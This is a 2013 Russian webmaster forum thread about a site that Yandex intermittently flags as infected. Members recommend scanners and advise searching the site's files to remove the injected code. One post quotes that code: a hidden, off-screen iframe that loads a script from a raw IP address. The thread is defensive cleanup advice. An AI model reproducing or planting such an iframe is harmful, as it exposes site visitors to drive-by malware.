Попробуйте проверить через antivirus-alarm.ru иногда он даже что то дельное показывает.
- 09.03.2013 00:09
- 0
- 09.03.2013 00:11
этим совету
sitecheck.sucuri.net/scanner/- 0
- 09.03.2013 00:42Студент
- Регистрация: 29.12.2012
- Сообщений: 46
- Репутация: 0
Меня смущает 2 вещи,которые не могу понять:
1. Если есть вирус, то он должен быть постоянно,почему в течении месяца Яндес раз 10 уже написал,то есть вирус, то вируса не обнаружено.При том,что ничего конкретного вообще не делалось
2.На хостинге 80 процентов сайтов выводятся с пометкой (угожает безопасности) ,я проверял выборочно,точно также ,в 1 день какойто сайт в выдаче Яндекса покажет зараженный,во втрой день этот же сайт в выдаче именно Яндекса--чистый.
P.S.все пароли уже раз 5 меняли,движок обновили- 0
12.09.2013 22:17andys1, а вообще, мой вам совет: лучше не использовать нуленные движки. Недобросовестные хацкеры часто оставляют там сюрпризы для веб-мастеров.
Кстати вирус может срабатывать на определенные устройства, как пример. Или ваш антивирус молча блокирует его. Всё же стоит поискать в файлах тот ip адресок...- 0
- 12.09.2013 23:13Дедушка ЭМО
- Регистрация: 23.09.2010
- Сообщений: 735
- Репутация: 495
Я так понял, что это не весь вредоносный код.
<style>.hp60pdz1o { position:absolute; left:-1256px; top:-1442px} </style>-это показывает где выводится <div>.hp60pdz1o</div>
<div class="hp60pdz1o"><iframe *src="ht*p://129.121.35.250/b269c38185437d0f310fbd187c089f92/q.php" width="389" height="473"></iframe> это показывает, как выводится , в данном случае размер окна всплывающего 398*473, в нем отрывается исполняемый файл с адреса ]http://129.121.35.250/b269c38185437d0f310fbd187c089f92/q.php
Видимо, есть что-то в коде, что создает этот <div>.hp60pdz1o</div>.
Я проверять, что там по адресу не стал.
Скачал бы на комп весь и проверил в редакторе на ".hp60pdz1o" и"http://129.121.35.*." и "b269c38185437d0f310fbd187c089f92/q.php" - все совпадения удалил. Потом проверил работоспособность кода.- 0
- 13.09.2013 02:57Студент
- Регистрация: 27.09.2012
- Сообщений: 74
- Репутация: 7
У вас iframe висит на сайте, сдвинутый в невидимую область. С айпишника в него подтягивается скрипт с вирусом или с кодом, считающимся вредоносным. Скорее всего он закодирован base64, и прогонять все файлы необходимо по слову base64, а затем расшифровывать. Хотя бывает и в наглую вставляют, не шифруя. Здесь поискать стоит по hp60pdz1o. Сливаете все файлы на комп и прогоняете поиском в файлах Тотал Коммандера. Найденный код корректно удалить.
- 0
- 13.09.2013 03:23Студент
- Регистрация: 11.02.2003
- Сообщений: 42
- Репутация: 18
batik, антивирус не найдет хрень в скриптах. Странно что никто не подсказал http://www.revisium.com/ai/ - для начала хватит.
Если не вылечит - будем принимать более действенные методы.
Надеюсь, про смену паролей лишний раз говорить не надо:)- 0
Тэги топика:
Похожие темы
| Темы | Раздел | Ответов | Последний пост |
|---|---|---|---|
Вирус на сайте? | Вопросы от новичков | 19 | 24.09.2012 17:01 |
Вирус на сайте. | WordPress | 2 | 07.04.2012 21:23 |
Вирус на сайте. | Web программирование | 1 | 03.04.2012 13:25 |
Вирус на сайте | Софт, скрипты, сервисы | 27 | 15.02.2010 21:41 |
adsense cpa google telegram xrumer yandex youtube zenno zennoposter аккаунт база банка быть вконтакт гугл делиться день есть запрос идея изменение импорт использовать качественный кейс ключ комплексный контакт купить люба монетизация накрутка новый нч-сч партнерский партнёрка партнёрская программа платформа поддержка поинт поинтовый программа работа размещение ресурс рост сайт скрипт спам ссылка стать тариф тиц-пр трастовый трафик учет форум хватать хрумер шаблон
Тем:
77,476Сообщений:
761,521Пользователей:
30,076Сейчас на сайте:
0 пользователей и 243 гостей
